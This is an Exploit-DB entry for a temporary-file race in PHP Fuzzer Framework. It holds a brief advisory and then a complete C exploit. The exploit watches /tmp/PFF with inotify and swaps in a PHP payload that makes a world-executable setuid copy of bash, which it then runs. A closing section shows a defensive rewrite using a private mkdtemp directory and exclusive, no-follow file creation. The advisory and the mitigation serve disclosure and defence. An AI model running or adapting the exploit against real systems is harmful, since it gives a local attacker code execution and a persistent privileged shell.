PHP Fuzzer Framework - Default Location Insecure Temporary File Creation

EDB-ID: 33145
CVE: N/A
Platform: Linux
Date: 2009-08-03

// source: https://www.securityfocus.com/bid/35924/info

PHP Fuzzer Framework creates temporary files in an insecure manner.

An attacker with local access could potentially exploit this issue to overwrite the application's temporary files and execute arbitrary code with the privileges of the victim user. Successfully exploiting this issue may compromise the affected application and possibly the computer.

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/inotify.h>
#define FILEA "/tmp/PFF/fuzz0.php"
#define FILEB "/tmp/fuzzlol.php"
#define MODEZ (S_IRWXU | S_IRWXG | S_IRWXO)

int main(int argc, char *argv[])
{
    int f,n,w;
    /* PHP payload: leaves a setuid copy of bash at /tmp/sh */
    char *s = "<? system(\"cp /bin/bash /tmp/sh; chmod 4777 /tmp/sh\"); ?>";
    struct inotify_event e;
    n = inotify_init();
    printf("-=*************-\n");
    /* stage the payload outside the fuzzer's directory */
    if ((f = open(FILEB, O_CREAT | O_RDWR| O_EXCL, MODEZ)) > 0){
        write(f, s, strlen(s));
        close(f);
    }
    printf("[+] created arbitrary code: %s\n",  FILEB);
    /* wait for the fuzzer to create a file in its predictable /tmp/PFF directory */
    w = inotify_add_watch(n, "/tmp/PFF", IN_CREATE);
    read(n, &e, sizeof(e));
    /* race: move the staged file onto the predictable name before the fuzzer runs it */
    rename(FILEB, FILEA);
    printf("[+] %s => %s\n", FILEB, FILEA);
    printf("[+] executing arbitrary code\n");
    sleep(2);
    printf("[+] race complete \n");
    execl("/tmp/sh", "/tmp/sh", (char *)0);
    return 0;
}
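
The mitigation for the predictable `/tmp/PFF/fuzz0.php` path, as an added example that is not part of the original advisory or of PHP Fuzzer Framework: a private 0700 directory from `mkdtemp()`, exclusive no-follow file creation, and an identity check before the file is used. The function names and the `/tmp/pff-demo-XXXXXX` template are assumptions made for illustration.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Private work directory: mkdtemp() picks an unpredictable name, mode 0700. */
int make_private_dir(char *tmpl)            /* tmpl must end in "XXXXXX" */
{
    struct stat st;
    if (mkdtemp(tmpl) == NULL) return -1;
    int dfd = open(tmpl, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (dfd >= 0 && fstat(dfd, &st) == 0 &&
        st.st_uid == geteuid() && (st.st_mode & 077) == 0)
        return dfd;                         /* ours, no group/other access */
    if (dfd >= 0) close(dfd);
    return -1;
}

/* O_EXCL refuses a pre-planted name, O_NOFOLLOW a symlink; file is 0600. */
int create_case_file(int dfd, const char *name, const char *body)
{
    int fd = openat(dfd, name, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;
    size_t len = strlen(body);
    if (write(fd, body, len) != (ssize_t)len)
        { close(fd); unlinkat(dfd, name, 0); return -1; }
    return fd;                              /* keep open until the file is used */
}

/* Before use: the name must still refer to the inode we created. */
int case_file_is_ours(int dfd, const char *name, int fd)
{
    struct stat a, b;
    if (fstat(fd, &a) || fstatat(dfd, name, &b, AT_SYMLINK_NOFOLLOW)) return 0;
    return S_ISREG(b.st_mode) && b.st_uid == geteuid() && b.st_nlink == 1 &&
           a.st_dev == b.st_dev && a.st_ino == b.st_ino;
}

int main(void)
{
    char tmpl[] = "/tmp/pff-demo-XXXXXX";   /* constructed sample template */
    int dfd = make_private_dir(tmpl);
    int fd = dfd < 0 ? -1 : create_case_file(dfd, "fuzz0.php", "<?php echo 1; ?>");
    printf("%s ours=%d\n", tmpl, fd >= 0 && case_file_is_ours(dfd, "fuzz0.php", fd));
    return fd < 0;
}
```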